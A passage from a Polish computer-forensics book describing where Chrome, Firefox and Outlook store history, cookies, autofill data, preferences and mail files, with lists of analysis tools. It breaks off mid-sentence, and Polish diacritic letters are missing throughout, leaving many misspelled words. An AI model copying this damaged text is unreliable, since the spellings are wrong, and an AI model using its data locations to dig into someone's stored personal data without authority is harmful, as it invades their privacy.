plikw: index, data_0, data_1, data_2 oraz data_3. Plik index zawiera tabel skrtw z informacjami
o pooeniu kadego z plikw w buforze. Pozostae pliki to tzw. bloki, poniewa kady plik data_x
zawiera dane w blokach o ustalonym rozmiarze. Jeeli plik, ktry ma zosta zapisany w pamici
podrcznej, przekracza maksymalny rozmiar obsugiwany przez plik bloku (16 kB), zostaje zapisany
w folderze bufora jako samodzielny plik. W takim przypadku jego nazwa zostaje zmieniona
na f_ z cigiem cyfr szesnastkowych. Cho pliki te nie maj rozszerzenia, jeli trzeba tylko
szybko przejrze typy plikw przechowywanych w pamici podrcznej, mona sprawdzi ich
sygnatury bez koniecznoci przegldania plikw blokw (chocia pliki tekstowe, np. strony
HTML, s skompresowane). Pliki blokw zawieraj wszystkie zapisywane metadane, np. nagwki
HTTP oraz nazwy i adresy plikw.
Cookies
Przegldarka Chrome wszystkie cookies zapisuje w pliku Cookies, ktry jest baz danych.
W kolumnie host_key zapisana jest domena, z ktrej pochodzi dane cookie. Pozostae pola, ktre
mog by interesujce dla specjalisty od informatyki ledczej, maj nazwy pozwalajce zorientowa si,
jakie jest ich przeznaczenie, np. name, value, creation_utc i last_accessed_utc. Znaczniki czasu s
zapisywane w formacie WebKit. Ponadto plik Cookies moe zawiera informacje identyfikacyjne,
np. pozwalajce rozpozna pooenie geograficzne uytkownika (kod pocztowy, wsprzdne
geograficzne) lub umoliwiajce rozpoznanie tosamoci (nazwy uytkownika, adresy e-mail).
Pobierane pliki
Plik historii zawiera te informacje o plikach zapisywanych przez uytkownika za pomoc
przegldarki Chrome. Stare wersje tej aplikacji przechowuj wszystkie te dane w tabeli downloads.
Natomiast nowsze wersje (od 26.) zapisuj je w tabelach downloads i downloads_url_chains.
Wszystkie wersje przegldarki Chrome zachowuj adresy URL pobranych plikw, ich rozmiar,
informacj o tym, ile bajtw danego pliku zostao rzeczywicie pobranych oraz czas rozpoczcia
pobierania. Nowsze wersje przegldarki dodatkowo rejestruj czas zakoczenia pobierania, to,
czy plik zosta otwarty oraz czy wg Chrome plik ten by szkodliwy. Zwaszcza dwie ostatnie pozycje
mog by niezwykle cenne w niektrych rodzajach ledztw.
Funkcja automatycznego uzupeniania

Funkcja automatycznego uzupeniania przegldarki Chrome zapamituje to, co uytkownik
wpisuje w polach tekstowych na stronach i automatycznie wprowadza te wartoci w podobnych
formularzach take na innych stronach lub przy kolejnej wizycie na tej samej stronie. Aby realizowa
te zadania, funkcja ta musi zapisywa wszystko, co uytkownik wpisuje w polach tekstowych, nazwy
tych pl oraz znaczniki czasu. Sam adres strony, na ktrej uytkownik wypeni pole, nie jest wprost
zapisywany, ale mona go znale przez skorelowanie znacznikw czasu z innymi artefaktami.
Dane funkcji automatycznego uzupeniania przegldarka Chrome zapisuje w kilku tabelach bazy
danych SQLite w pliku Web Data. Funkcja ta jest wczona domylnie, wic jeli uytkownik celowo
jej nie wyczy, plik ten powinien zawiera wiele cennych informacji.
Zakadki
Przegldarka Chrome przechowuje zakadki uytkownika w obiekcie JSON w pliku o nazwie Bookmarks
(dodatkowo tworzy kopi zapasow w pliku o nazwie Bookmarks.bak). Zawarto tego pliku mona
atwo odczyta w dowolnym edytorze tekstowym i kadej przegldarce danych w formacie JSON.
Chrome zapisuje dat dodania zakadki, jej adres URL, tytu oraz struktur folderw zakadek.
Preferencje
Preferencje uytkownika s przechowywane w pliku Preferences w formie obiektu JSON
(User Data\Default\Preferences). W pliku tym jest wiele przydatnych informacji, np. lista
zainstalowanych rozszerze i wtyczek. Jeeli uytkownik korzysta z usugi synchronizacji Chrome,
plik Preferences zawiera informacje o synchronizowanych elementach, czasie ostatniej

synchronizacji oraz koncie Google powizanym z przegldark. Niektre ustawienia ujawniaj
nieco informacji o strukturze katalogw systemu plikw. Przykadowo savefile.default_directory,
selectfile.last_directory i download.default_directory mog zawiera cieki ujawniajce interesujce
lokalizacje. Inne potencjalnie przydatne ustawienia preferencji to autofill.enabled, browser.clear_data
oraz browser.clear_lso_data_enabled.
Ostatni wart uwagi ledczego preferencj jest ustawienie profile.per_host_zoom_levels.
Przegldarka zapisuje w nim zdarzenia powikszenia i zmniejszenia strony przez uytkownika,
aby zastosowa taki sam format widoku przy nastpnej wizycie na tej samej stronie. Ustawienie to
jest interesujce z punktu widzenia RI, poniewa w aktualnej wersji Chrome (27.) zawarta w nim
lista domen pozostaje nienaruszona nawet po skasowaniu caej historii przegldarki. Wprawdzie
zapisywane s tylko domeny gwne (a nie pene adresy URL) i tylko dla tych stron, ktre uytkownik
zmniejszy lub powikszy, ale i tak czasami warto sprawdzi te informacje.
Narzdzia
Jako e Chrome to najmodsza ze wszystkich najwaniejszych przegldarek, do analizy jej
artefaktw jest mniej narzdzi. Dodatkowe trudnoci programistom narzdzi sprawia bardzo
szybki cykl pojawiania si nowych wersji i sama liczba ju istniejcych wersji programu. Niektre
zmiany powoduj modyfikacje artefaktw, a narzdzia ledcze za tym nie nadaj. Funkcja
automatycznej aktualizacji przegldarki Chrome dziaa w tle i aktualizuje aplikacj nawet bez
udziau uytkownika. Dziki temu w uyciu jest niewiele starych, mniej bezpiecznych wersji
Chrome. Dla nas wad tego podejcia jest to, e narzdzia ledcze mog nie dziaa prawidowo
z najnowszymi wersjami przegldarki.
Poniewa wikszo artefaktw pozostawianych przez przegldark Chrome znajduje si
w bazach danych SQLite i plikach JSON, mona si do nich dosta na wiele sposobw. Jednym
z nich jest dostp bezporedni. Do dyspozycji jest wiele narzdzi do odczytywania danych
w formatach SQLite i JSON. Przykadowo bazy danych SQLite mona przeglda za pomoc
aplikacji SQLite Database Browser i rozszerzenia do przegldarki Firefox SQLite Manager.
Oprcz tych popularnych narzdzi z graficznym interfejsem uytkownika, mona uywa take
darmowego narzdzia wiersza polece o nazwie sqlite3. Osoby potrafice programowa mog
skorzysta z funkcji przetwarzania tych formatw danych dostpnych w takich jzykach
programowania jak Python i Perl.
W INTERNECIE
SQLite Database Browser sourceforge.net/projects/sqlitebrowser
Rozszerzenie do Firefoksa SQLite Manager addons.mozilla.org/en-us/firefox/addon/sqlite-manager
sqlite3 http://www.sqlite.org/download.html
Perl http://www.perl.org
Python http://www.python.org
Jednak w wikszoci przypadkw potrzebne jest bardziej kompleksowe rozwizanie

do analizy artefaktw z moliwoci wywietlania danych w formie czytelnego raportu.
Cho przegldarka Chrome jest wzgldnie nowa, jej szybko rosnca popularno sprawia,
e powstao ju wiele darmowych i patnych narzdzi. Oprcz komercyjnych programw
wymienionych wczeniej, do analizy artefaktw przegldarki Chrome mona te uywa
nastpujcych darmowych narzdzi.
W INTERNECIE
NirSoft ChromeHistoryView www.nirsoft.net/utils/chrome_history_view.html
NirSoft ChromeCacheView www.nirsoft.net/utils/chrome_cache_view.html
Woanware ChromeForensics www.woanware.co.uk/forensics/chromeforensics.html
Hindsight code.google.com/p/hindsight-internet-history
Wszystkie te narzdzia mog by zastosowane do analizy systemu na ywo co rzadko

powinno by koniecznoci jak i badania danych zapisanych w katalogu. Teraz zajmiemy si
przegldark Mozilla Firefox.
Mozilla Firefox
Firefox to dostpna w rnych systemach operacyjnych przegldarka z otwartym kodem
rdowym. Jej wersje beta pojawiy si w 2002 roku pod nazw Phoenix. Jednak ze wzgldu na
problemy ze znakiem towarowym nazw zmieniono na Firebird, a pniej w 2004 roku na Firefox.
Przegldarka Firefox jest odnog projektu aplikacji Mozilla, ktry bazowa na pracach wykonanych
w latach 90. ubiegego wieku przez firm Netscape Communications Corporation. Aplikacja
szybko zdobya popularno i ustabilizowaa si na pewnym poziomie w 2010 roku. Od wersji 5.,
ktra pojawia si w czerwcu 2011 roku, programici Firefoksa zmienili strategi wydawania
kolejnych wersji. Postanowili przyspieszy proces, tak aby publikowa nowe wydanie lub now
ga co sze tygodni. Oficjalnym powodem tego posunicia bya ch szybszego dostarczania
uytkownikom nowych funkcji. W grudniu 2013 roku pojawia si przegldarka Firefox 26,
lecz jej popularno zacza nieco spada, gwnie z racji rosncej popularnoci przegldarki
Google Chrome.
Formaty danych i miejsca ich przechowywania

Przegldarki Mozilla i Chrome przechowuj dane w podobny sposb. Mozilla, podobnie jak
Chrome, zapisuje prawie wszystkie swoje dane w plikach oraz wykorzystuje do tego gwnie
formaty SQLite i JSON. Dane s przechowywane w profilu uytkownika w miejscach
przedstawionych w tabeli na nastpnej stronie.
System operacyjny Miejsce

Windows Vista i nowsze C:\Users\{username}\AppData\Roaming\Mozilla\Firefox
C:\Users\{username}\AppData\Local\Mozilla\Firefox (Cache)
Windows XP i starsze C:\Documents and Settings\{username}\Application Data\Mozilla
C:\Documents and Settings\{username}\Local Settings\
Application Data\Mozilla (Cache)
Linux /home/{username}/.mozilla/firefox
/home/{username}/.cache/.mozilla/firefox (Cache)
OS X /Users/{username}/Library/Application Support/Firefox
/Users/{username}/Library/Caches/Firefox (Cache)
Przegldarka Firefox dla jednego uytkownika systemu operacyjnego moe utrzymywa

kilka profili cho wikszo uytkownikw ma tylko jeden. Dane kadego takiego profilu s
przechowywane w katalogu o nazwie zoonej z omiu losowych znakw z rozszerzeniem .default
umiejscowionym w katalogu Profiles np. e91fmfjw.default. W systemach Windows i OS X
przegldarka Firefox umieszcza te katalogi w podkatalogu o nazwie Profiles. W systemie Linux
katalogi profili Firefoksa znajduj si w katalogu firefox nie ma dodatkowej warstwy Profiles.
Jedn z najprzyjemniejszych rzeczy, jeli chodzi o dane przegldarki Firefox, jest to, e dana wersja
aplikacji we wszystkich systemach operacyjnych uywa tych samych nazw plikw. Ponadto nazwy
te nie zmieniy si od wersji Firefox 5. W poniszej tabeli przedstawiamy typowe dla Firefoksa
nazwy plikw.
Nazwa pliku Format Przeznaczenie

cookies.sqlite SQLite Przechowywanie cookies
places.sqlite SQLite Przechowywanie danych historycznych. W najnowszych wersjach
Firefoksa w pliku tym przechowywane s dodatkowo informacje
o zakadkach i pobieranych plikach
formhistory.sqlite SQLite Przechowywanie historii formularzy na potrzeby funkcji
automatycznego uzupeniania
prefs.js JS Przechowywanie preferencji konfiguracyjnych uytkownika
downloads.sqlite SQLite Przechowywanie informacji o pobieranych plikach w wersjach
przegldarki do 19.
bookmarks.html HTML Przechowywanie zakadek w bardzo starych wersjach Firefoksa (do 2.)
Niektre bazy danych SQLite Firefoksa wykorzystuj nowsze lub opcjonalne funkcje SQLite
uniemoliwiajce ich otwieranie w niektrych narzdziach. Jeli wic napotkasz tego typu problemy,
sprawd, czy masz najnowsz wersj narzdzia do otwierania baz danych SQLite. Nawet jeli uywasz
narzdzia wiersza polece sqlite3, moe by konieczne zaopatrzenie si w jego najnowsz wersj
z oficjalnej strony.
Pami podrczna przegldarki Firefox jest podzielona na szereg folderw. Tak jak inne dane,
przegldarka Firefox przechowuje dane bufora kadego profilu w osobnym folderze. Firefox
tworzy 16 katalogw, 0 9 i A F, w katalogu o nazwie Cache. Katalog ten znajduje si w miejscu
wskazanym wczeniej w tabeli w odpowiednim katalogu profilu. W ksice tej nie opisujemy
wewntrznej budowy pamici podrcznej przegldarki Firefox, ale wiele cennych informacji na ten
temat mona znale w internecie.
W INTERNECIE
articles.forensicfocus.com/2012/03/09/firefox-cache-format-and-extraction
code.google.com/p/firefox-cache-forensics/wiki/FfFormat
Uytkownik przegldarki Firefox moe ustawia sposb kasowania danych historycznych,

do ktrych zaliczaj si wszystkie opisane wczeniej artefakty. Istnieje moliwo skasowania
tych danych na danie, jak rwnie przy zamykaniu przegldarki. Nieco dalej opisujemy,
gdzie naley szuka odpowiednich opcji.
W kilku poniszych podpunktach bardziej szczegowo opisujemy poszczeglne artefakty
przegldarki Firefox. W wikszoci przypadkw do analizy danych lepiej uy specjalnego
narzdzia zamiast samodzielnie pisa zapytania do bazy danych SQLite. Podajemy tylko troch
dodatkowych informacji o poszczeglnych artefaktach, aby mona byo si zorientowa, gdzie
szuka rnych rodzajw danych i nastpnie przeanalizowa je za pomoc odpowiednich narzdzi,
ktrych lista znajduje si dalej.
Historia
Przegldarka Firefox zapisuje histori przegldanych stron w bazie danych SQLite o nazwie places.sqlite.
Podstawowe informacje s przechowywane w dwch tabelach, moz_places i moz_historyvisits.
Rekordy w tych tabelach s poczone midzy polem id w tabeli moz_places i polem places_id
w tabeli moz_historyvisits. Podstawowe informacje dotyczce historii stron przegldanych przez
uytkownika mona wywietli za pomoc zapytania SQL podobnego do uytego do wywietlenia
historii z przegldarki Chrome.
Pobierane pliki
Dla kadego pobranego pliku przegldarka Firefox zapisuje dodatkowe informacje. Pocztkowo
dane te byy przechowywane w osobnej bazie danych SQLite o nazwie downloads.sqlite. Bya to
bardzo prosta baza danych, w ktrej dane przechowywano w jednej tabeli o nazwie moz_downloads.
W wersji Firefox 20 wprowadzono jednak nowy meneder pobierania i przeniesiono dane dotyczce
pobieranych plikw do tabeli o nazwie moz_annos w bazie danych places.sqlite. Stary plik
downloads.sqlite nie jest ju uywany.
Zakadki
Do Firefoksa 2 zakadki byy przechowywane w pliku HTML, ktrego zawarto mona byo
obejrze w przegldarce internetowej albo edytorze tekstu. W Firefoksie 3, ktry pojawi si w 2008
roku, zakadki przeniesiono do tabeli moz_bookmarks bazy danych places.sqlite. Pozycje znajdujce
si w tabeli moz_bookmarks s poczone z pozycj w moz_places przy uyciu pola zakadek fk
w celu powizania ich z polem id miejsc. Jest to bardzo wane poczenie, poniewa tabela
moz_bookmarks nie zawiera adresw URL zakadek wszystkie adresy znajduj si w tabeli
moz_places.
Funkcja automatycznego uzupeniania

Dane historyczne formularzy zapisywane przez funkcj automatycznego uzupeniania s
przechowywane w bazie danych SQLite formhistory.sqlite. Istnieje w niej tabela o nazwie
moz_formhistory, w ktrej znajduj si wszystkie rekordy. Rekordy te to proste pary klucz-warto
z dodatkowymi metadanymi opisujcymi np. czas pierwszego i ostatniego uycia wartoci oraz
liczb wszystkich przypadkw uycia. Dane z formularzy s mao przydatne w ledztwach
w sprawie wama, ale mog by niezwykle cenne w innych dochodzeniach.
Cookies
Przegldarka Firefox zapisuje cookies w bazie danych cookies.sqlite. Jej jedyna tabela moz_cookies
zawiera wszystkie dane dotyczce kadego z zapisanych cookies. W niektrych ledztwach
przydatne bywaj same cookies, ale w wikszoci przypadkw najwaniejsze s zwizane z nimi
domeny i znaczniki czasu.
Preferencje
Uytkownik przegldarki Firefox moe zmienia wiele ustawie konfiguracyjnych. Wszystkie
s zapisywane w pliku o nazwie prefs.js. Jest to zwyky plik tekstowy, wic jego zawarto mona
wywietli w dowolnym edytorze tekstu. Niektre preferencje maj duy wpyw na dostpno
rnych artefaktw przegldarki. Przykadowo uytkownik moe ustawi przegldark tak,
aby kasowaa lady uywania podczas koczenia pracy albo w ogle nie zapisywaa danych
historycznych. Jeli trzeba, uytkownik moe te usun artefakty na danie za pomoc
specjalnych opcji w menu. Tabela na nastpnej stronie zawiera zestawienie ustawie Firefoksa,
ktre maj wpyw na powstawanie artefaktw przegldarki.
Ustawienie Efekt
user_pref("browser.privatebrowsing.autostart", true); Warto true powoduje wyczenie
rejestracji danych historycznych
user_pref("privacy.sanitize.sanitizeOnShutdown", true); Warto true powoduje
user_pref("privacy.clearOnShutdown.offlineApps", true); skasowanie danych historii,
user_pref("privacy.clearOnShutdown.passwords", true); wcznie z okrelonymi
artefaktami, przy koczeniu pracy
user_pref("privacy.clearOnShutdown.siteSettings", true);
user_pref("browser.cache.disk.capacity", 358400); To ustawienie ogranicza rozmiar
(w kB) pamici podrcznej
przegldarki Firefox. Jeli
zostanie wpisana maa liczba,
przegldarka pozostawi po sobie
niewielk ilo informacji
Pami podrczna
W pamici podrcznej przegldarka Firefox przechowuje kopie treci pobieranej ze stron
internetowych i rnych serwerw odwiedzanych przez uytkownika. Domylnie rozmiar bufora
Firefoksa wynosi 350 MB. Starsze i rzadko uywane dane s usuwane, aby zrobi miejsce dla
nowych. Jak kada inna pami podrczna, bufor Firefoksa ma przede wszystkim przyspieszy
dziaanie aplikacji przez wielokrotne wykorzystanie wielu pobranych zasobw. Podczas ledztwa
w pamici tej mona znale kopie danych ze szkodliwych witryn, ktre odwiedzi uytkownik,
a nawet dane ze stron odwiedzonych przez hakera. Uytkownik moe skasowa zawarto pamici
podrcznej i inne artefakty (np. cookies) za pomoc narzdzi dostpnych w menu przegldarki.
Narzdzia
Jak ju wiesz, jednym z narzdzi, za pomoc ktrych mona zbada artefakty pozostawiane w systemie
przez przegldark Firefox, jest przegldarka baz danych SQLite. Cho posugiwanie si SQLite to bardzo
niewygodna metoda pracy, czasami nie da si jej zastpi niczym innym z powodu bdw i braku
obsugi niektrych funkcji w bardziej rozwinitych narzdziach. Kilka narzdzi do przegldania
baz danych SQLite zostao ju wymienionych wczeniej.
Podobnie jak w przypadku Internet Explorera i Chrome, dobrym wyborem s patne i darmowe
narzdzia wymienione na pocztku podrozdziau Przegldarki internetowe. Ponadto istniej te
dodatkowe specjalne narzdzia przeznaczone do pracy z Firefoksem. Naszym zdaniem najlepsze
w tej kategorii s produkty firmy NirSoft.
W INTERNECIE
History Viewer www.nirsoft.net/utils/mozilla_history_view.html
Cookie Viewer www.nirsoft.net/utils/mzcv.html
Cache Viewer www.nirsoft.net/utils/mozilla_cache_viewer.html
Downloads Viewer www.nirsoft.net/utils/firefox_downloads_view.html
KLIENTY POCZTY ELEKTRONICZNEJ

W wielu rodzajach ledztw materiaem dowodowym o kluczowym znaczeniu s wiadomoci e-mail.
W dochodzeniach w sprawie wama bardzo czsto odkrywa si, e zdarzenie zostao zapocztkowane
przez atak typu spear phishing, ktry polega na tym, e haker wysya wytypowanym osobom
wiadomoci e-mail ze specjalnie spreparowan treci. Czsto zdarzaj si te oszustwa typu
scareware, w ktrych haker wysya wiadomoci e-mail z faszywych lub skradzionych kont e-mail.
Inni szubrawcy mog wykorzystywa e-maile do koordynacji dziaa i przesyania danych.
W kocu naley pamita, e same konta e-mail take mog by bezporednim celem hakerw
niektrzy z nich chc po prostu wykra czyj poczt. We wszystkich tych przypadkach trzeba
dowiedzie si, jakie s uywane aplikacje pocztowe, jakie dane przechowuj oraz te informacje
przeanalizowa.
Podstawow informacj jest sama wiadomo e-mail. Jej tre skada si z dwch gwnych
czci treci waciwej (ang. body) i nagwkw (ang. headers). Tre waciwa reprezentuje
sam wiadomo, a wic tekst i ewentualne zaczniki. Z reguy jest ona zakodowana w formacie
MIME (ang. Multipurpose Internet Mail Extensions). Jest to standard kodowania, ktry zosta
utworzony w celu zapewnienia prawidowej obsugi nowych rodzajw treci multimedialnej, jako
e poczta przechodzi przez rne rodzaje systemw pocztowych. Nagwki zawieraj rne
informacje kontrolne, np. adres e-mail nadawcy, adres e-mail adresata, dat wysania, temat, list
serwerw, przez ktre przesza wiadomo i wiele innych.
Dekodowanie nagwkw poczty elektronicznej moe by bardzo skomplikowanym zajciem.
Jeli potrzebujesz pomocy w tym zakresie, mog przyda si informacje z poniszych stron
internetowych. Tylko uwaaj na stronie Google Apps, na ktrej lepiej nie wprowadza poufnych
informacji.
W INTERNECIE
www.arclab.com/en/amlc/how-to-read-and-analyze-the-email-header-fields-spf-dkim.html
www.jdfsl.org/subscriptions/abstracts/JDFSL-V6N2-column-Banday.pdf
toolbox.googleapps.com/apps/messageheader
W podrozdziale tym przygldamy si artefaktom pozostawianym w komputerze przez

najpopularniejsze klienty poczty elektronicznej Microsoft Outlook dla systemw Windows,
Microsoft Outlook dla systemw OS X, Apple Mail oraz internetowe klienty poczty elektronicznej.
Zanim przejdziemy do omwienia kadego z nich osobno, chcielibymy doda kilka sw na temat
pracy z formatami poczty elektronicznej. Oprcz wymienionych przez nas, istnieje wiele innych
klientw e-mail. Postpujc wg oglnych wskazwek zawartych w podrozdziale Gdzie aplikacje
przechowuj dane, mona znale lady pozostawione przez kadego klienta poczty, ale wtedy
powstaje kolejna trudno, ktr jest analiza tych danych. Udao nam si znale narzdzia
Aid4Mail i Emailchemy, ktre przeksztacaj dane pochodzce z rnych klientw poczty na
bardziej znane formaty. Istnieje wiele innych narzdzi o podobnym zastosowaniu. Najatwiej je
znale za pomoc wyszukiwarki internetowej.
W INTERNECIE
www.aid4mail.com/email.ediscovery.forensic.software.php
www.weirdkid.com/products/emailchemy
Kiedy bdziesz postpowa zgodnie z tym oglnym procesem, powinno da si przejrze dane
z prawie kadego istniejcego klienta poczty. Mona np. przekonwertowa dane z programu
Eduora Mail na standardowy format mbox i otworzy wyniki w darmowym kliencie Mozilla
Thunderbird. Teraz moemy przej do internetowych klientw poczty elektronicznej.
Internetowe klienty poczty elektronicznej

Wedug licznych ankiet przeprowadzonych w roku 2012 i na pocztku 2013 tradycyjne komputerowe
klienty poczty, takie jak Microsoft Outlook, maj znikomy udzia w rynku obsugi poczty elektronicznej.
Z ankiet tych wynika, e ponad 50% wszystkich uywanych klientw poczty to klienty przegldarkowe
i mobilne, cho nasze dowiadczenie mwi nam, e w wielu rodowiskach korporacyjnych wci
dobrze maj si te kombajny pocztowe w stylu Outlooka. Wrd usug pocztowych mona
wymieni np. Gmail, Hotmail/Outlook.com/Live.com, AOL oraz Yahoo!, a take mobilne aplikacje
pocztowe w iPhoneach firmy Apple i urzdzeniach z systemem Android. Wikszo tych usug
dodatkowo zawiera funkcje zapisywania kontaktw, kalendarz oraz chat.
Internetowe usugi pocztowe s dla ledczego nie lada wyzwaniem. Wikszo z nich nie
zapisuje poczty w systemie lokalnym. Jako e uytkownik korzysta z tych usug w przegldarce
internetowej lub aplikacji naladujcej tak przegldark, w komputerze mona znale niewiele
wicej ladw ni pozostawione przez przegldarki. Szerzej na temat trudnoci zwizanych
z internetowymi klientami poczty i troch wskazwek, jak je rozwiza, mona przeczyta
na podanych poniej stronach internetowych.
W INTERNECIE
www.forensicfocus.com/email-evidence-now-you-see-it
www.magnetforensics.com/webmail-forensics-digging-deeper-into-the-browser
www.magnetforensics.com/webmail-forensics-part-2-mobile-applications
www.blackhat.com/presentations/bh-usa-03/bh-us-03-akin.pdf
hackingexposedcomputerforensicsblog.blogspot.com/2013/09/daily-blog-95-webmail-artifacts-from.html
Uwaga Niektrzy uytkownicy tak ustawiaj swoje wypasione klienty poczty, np. Microsoft Outlook,
aby pobieray poczt z ich usug sieciowych. W takich przypadkach istnieje szansa, e na dysku
komputera znajduje si kopia wiadomoci e-mail. Dane te mona znale, postpujc wg
wskazwek opisanych dalej.
Jako e internetowe systemy pocztowe cigle si zmieniaj, najlepszym sposobem na wykrywanie

artefaktw jest uycie czsto aktualizowanego specjalistycznego narzdzia. Tradycyjne pakiety
oprogramowania ledczego (zarwno patne, jak i darmowe) z pewnoci znajd troch ladw, ale
nie tyle, ile mogyby znale wyspecjalizowane programy. Naszym zdaniem najlepsze efekty mona
osign przy uyciu takich narzdzi jak Magnet Forensics Internet Evidence Finder, NetAnalysis firmy
Digital Detective oraz Siquest Internet Examiner Toolkit (wczeniej zwany CacheBack). S to do drogie
aplikacje, ale warto za nie zapaci, jeli kto czsto musi analizowa poczt z klientw internetowych.
W INTERNECIE
Internet Evidence Finder www.magnetforensics.com/software/internet-evidence-finder
NetAnalysis www.digital-detective.co.uk/netanalysis.asp
Internet Examiner Toolkit www.siquest.com
Jeli wymienione narzdzia nie s pomocne, mona przeprowadzi szczegow analiz czasow
interesujcego nas okresu. W analizie tej naley uwzgldni wszystkie aspekty systemu, takie jak
historia przegldarki, system plikw, rejestr, dzienniki i inne rda informacji. W podrozdziale
powiconym przegldarkom internetowym znajdziesz wiele informacji na temat wyszukiwania
artefaktw w wybranej aplikacji. Czasami odkrycia poczynione tymi metodami pozwalaj
odpowiedzie na najwaniejsze pytania, a przynajmniej podsuwaj jakie tropy.
W niektrych przypadkach istnieje moliwo uzyskania dostpu do konta e-mail za zgod
uytkownika, przy uyciu nakazu przeszukania lub za pomoc innych rodkw prawnych.
Biorc pod uwag to, jak trudno znale przydatne artefakty, nikogo nie powinno dziwi, e coraz
wicej ledczych decyduje si wanie na takie metody. Naley jednak skrupulatnie przestrzega
obowizujcego w danym regionie prawa, najlepiej konsultowa wszystkie dziaania z radc prawnym
oraz dokadnie opisywa w dokumentacji wszystkie prby uzyskania dostpu do konta e-mail.
Podczas pracy z poczt elektroniczn bardzo atwo wplta si w kopoty prawne, wic nie odwlekaj
rozmowy z prawnikiem i kontaktuj si z nim czsto take w trakcie akcji.
Microsoft Outlook dla systemw Windows

Jednym z najpopularniejszych klientw poczty e-mail jest program Microsoft Outlook. Cho wystpuje
on w wersjach dla systemw firm Microsoft i Apple, najczciej mona go spotka w systemach
operacyjnych Windows. Outlook istnieje od koca lat 90. ubiegego wieku i obsuguje kilka
protokow serwerw poczty elektronicznej. Przykadowo za pomoc tego programu mona
korzysta z protokou POP (ang. Post Office Protocol), IMAP (ang. Internet Message Access Protocol),
Microsoft Exchange oraz kilku usug sieciowych (czyli opartych na protokole HTTP). Istnieje wiele
dodatkw rozszerzajcych funkcjonalno programu Microsoft Outlook o obsug dodatkowych
protokow poczty elektronicznej, rodzajw szyfrowania, integracj z urzdzeniami przenonymi
i sieciami spoecznociowymi itd. Firma Microsoft wykorzystuje wasne techniki przechowywania
danych do zapisywania nie tylko samej poczty, ale rwnie danych kalendarza, zada i kontaktw.

Program Outlook zapisuje dane w rnych katalogach i w plikach o rnych nazwach w zalenoci
od wersji systemu operacyjnego i wykorzystywanego protokou pocztowego. W poniszej tabeli
przedstawiono domylne lokalizacje plikw danych tego klienta uywane w najpopularniejszych
wersjach systemu Windows.
System operacyjny cieka

Windows Vista i 7 C:\Users\{Profil_Windows}\AppData\Local\Microsoft\Outlook\{login}.ost
C:\Users\{Profil_Windows}\Documents\Outlook Files\Outlook.pst
Windows 2000 i XP C:\Documents and Settings\{Profil_Windows}\Local Settings\Application
Data\Microsoft\Outlook\{Nazwa_konta_e-mail}.pst
C:\Documents and Settings\{Profil_Windows}\Documents\Outlook Files\
Outlook.pst
Oczywicie s to katalogi, w ktrych powinny znajdowa si pliki. Jednak uytkownik

programu Outlook moe zmieni te lokalizacje lub uy innych plikw do przechowywania
danych. Dobrym miejscem na sprawdzenie tych informacji jest klucz rejestru systemu Windows
HKEY_CURRENT_USER\Software\Microsoft\Office\{wersja}\Outlook\Search\Catalog, w ktrym
wersja to krtka nazwa numeru wersji pakietu Office. Ponisza tabela zawiera wykaz najczciej
spotykanych wersji pakietu Office i odpowiadajcych im krtkich numerw.
Nazwa wersji Numer wersji

Microsoft Office XP 10.0
Microsoft Office 2003 11.0
Ponadto w Outlooku istnieje moliwo skonfigurowania wielu profili. Kady z nich ma wasne
ustawienia, takie jak serwery poczty e-mail, adresy e-mail, sygnatury i pliki danych. Wszystkie pliki
danych Outlooka dla wszystkich profili s wymienione we wspomnianym wczeniej kluczu rejestru,
ale warto wiedzie, e istnieje moliwo wystpowania wielu profili i zna ich nazwy. Lista nazw
profili Outlooka wystpuje w formie kluczy w kluczu HKEY_CURRENT_USER\Software\
Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles. Jeli w jednym
systemie znajduje si kilka profili, czasami bardzo wane jest ustalenie, ktry z nich jest domylny.
Najatwiej sprawdzi to w kluczu HKEY_CURRENT_USER\Software\Microsoft\Windows NT\
CurrentVersion\Windows Messaging Subsystem\Profiles\DefaultProfile. Ponadto w sytuacji,
gdy system zawiera kilka profili, nazwy nowo tworzonych plikw danych Outlooka maj
przedrostek - {nazwa profilu}. Dodaje si go po to, by wyranie zaznaczy przynaleno kadego
pliku danych do jednego profilu. Usunicie profilu za pomoc opcji administracji poczt w Panelu
sterowania systemu Windows nie powoduje skasowania powizanych z nim plikw danych.
Format danych
Program Outlook wykorzystuje format plikw o nazwie PFF (ang. Personal Folder File).
W rodowiskach Microsoft Exchange Outlook przechowuje lokalnie kopi poczty elektronicznej
w pliku o nazwie OST (ang. Offline Storage Table), ktry jest rodzajem pliku PFF. W innych
rodowiskach, takich jak np. POP (ang. Post Office Protocol) i archiwa Outlooka, uywany jest
format PST (ang. Personal Storage Table) jeszcze inna odmiana PFF. Pliki te take zawieraj
dodatkowe dane, takie jak spotkania zapisane w kalendarzu i informacje kontaktowe. Jako e
oba formaty s oparte na formacie PFF, wikszo narzdzi rozpoznajcych OST rozpoznaje
take PST i odwrotnie.
W INTERNECIE
Libpff Project code.google.com/p/libpff
Cho format PFF jest wasnoci firmy Microsoft, inne jednostki sporzdziy dla niego bardzo
dobr dokumentacj. Kilka cennych dokumentw na ten temat mona znale w sekcji plikw
do pobrania (Downloads) na stronach projektu libpff. Jeli chcesz szczegowo pozna ten format
danych, zalecamy uwane przeczytanie tych dokumentw.
Narzdzia
Wyrnia si dwie kategorie narzdzi do analizowania plikw OST i PST.
Patne narzdzia ledcze programy EnCase firmy Guidance Software i FTK firmy
AccessData maj wbudowane funkcje przetwarzania i analizowania plikw OST i PST.
Przykadowo w programie EnCase mona po prostu klikn prawym przyciskiem wybrany
plik i w menu, ktre si pojawi, wybra pozycj View File Structure (wywietl struktur
pliku). Program ten wywietla zawarto pliku danych e-mail w postaci drzewa, ktre
mona przeglda i przeszukiwa jak system plikw.
Narzdzia o otwartym kodzie rdowym najlepiej prowadzonym i udokumentowanym
projektem o otwartym kodzie rdowym do przetwarzania plikw OST i PST, jaki znamy,
jest libpff. W ramach tego projektu dostarczany jest kod do skompilowania i plik wykonywalny
o nazwie pffexport, ktry eksportuje pozycje z plikw OST i PST. W systemie Windows
narzdzia libpff mona skompilowa np. za pomoc rodowiska Cygwin.
Poniewa nie kady moe korzysta z patnych rozwiza, przyjrzymy si bliej otwartym
narzdziom libpff.
Twrca tych narzdzi udostpnia je wycznie w formie kodu rdowego, co oznacza, e trzeba
je samodzielnie skompilowa, aby otrzyma gotowy do uycia plik wykonywalny. Na stronie
internetowej projektu zamieszczono artyku wiki na temat sposobu kompilacji tych narzdzi
